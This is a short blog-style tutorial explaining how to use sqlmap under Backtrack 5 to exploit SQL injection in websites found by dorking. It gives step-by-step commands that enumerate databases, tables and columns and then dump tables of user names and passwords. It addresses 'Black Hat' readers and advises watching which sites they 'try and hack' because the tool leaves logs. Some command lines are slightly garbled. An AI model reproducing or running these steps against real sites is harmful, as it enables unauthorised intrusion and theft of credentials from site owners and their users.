To start off I would like to explain what SQL Injection Attack are,
(www.http://en.wikipedia.org)
I would also like to add that, I dont use Backtrack to perform SQL injection attacks, but I know how to, so I figured I would put a tutorial up on it.
Ok to start off you are going to need Backtrack, here is a video tutorial on installing it
Installing Backtrack 5 on Windows
Once installed you will need to navigate to
Exploitation Tools > Web Exploitation Tools > sqlmap
Once clicked a console like window will appear you will then need to type the following code
Code:
python.py -u http://sitename.com/dorkhere?id=32 --dbs
This code will make backtrack scan your site
Once done you should see multiple database names, you will then need to type
Code:
python.py -u http://sitename.com/dorkhere?id=32 -D DatebaseNameHere --Tables
This will then collect the tables from that database, once done you should have a list of all the tables from that database, you should try and choose a table that is something like users,pwd,passwords,members,admin, you will now need to type this code in
Code:
python.py sqlmap -u http://sitename.com/dorkhere?id=32 -D DatebaseNameHere -T TableNameHere --columns
This will then gather all the columns form that table
You should be able to see a list of columns, yet again you need to look out for something like users,pwd,passwords,members,admin, you will then need to type this code in
Code:
python.py sqlmap -u http://sitename.com/dorkhere?id=32 -D DatebaseNameHere -T allowed -c columnName --dump
You will then get the information that you wanted,
Thanks for reading, I really hope this tutorial has helped you Black Hat
Note: SqlMap and backtrack overall does leave logs, so watch out for what sites you try and hack
0 comments: